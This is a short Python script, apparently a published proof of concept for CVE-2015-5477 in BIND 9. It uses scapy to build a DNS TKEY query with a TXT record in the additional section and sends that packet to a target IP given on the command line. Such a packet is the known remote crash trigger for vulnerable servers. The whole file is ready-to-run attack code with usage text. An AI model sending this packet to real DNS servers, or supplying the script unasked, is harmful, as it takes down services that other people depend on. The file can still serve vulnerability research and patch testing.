#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : tintinweb@oststrom.com <github.com/tintinweb>

import sys
from scapy.all import *

def main():
    if len(sys.argv)<=1:
        print """
USAGE: %s <target.ip> [qname=.]
"""%(sys.argv[0])
        sys.exit(1)

    target = sys.argv[1]
    qname = sys.argv[2] if len([a for a in sys.argv if a=="--debug"])>2 else "."
    debug = True if "--debug" in sys.argv else False
    conf.verb = debug
    print "[ ] CVE-2015-5477 BIND 9 PoC"
    print "[i] target: %s"%target
    print " [+] sending DNSQ TKEY with additional record ..."

    # scapy messes up additional records when put into DNS(ar=..)
    p = DNS(rd=1, qd=DNSQR(qname=qname, 
			   qtype=0xf9 , # TKEY 
                           qclass='ANY' ), arcount=1) / DNSRR(rrname=qname, 
                                                             type='TXT', 
                                                             rclass='ANY', 
                                                             rdata="x") 

    if debug:
        p.show()

    send(IP(dst=target)/UDP()/p)
    print " [!] pkt sent!"
    sys.exit(0)

if __name__=='__main__':
    main()
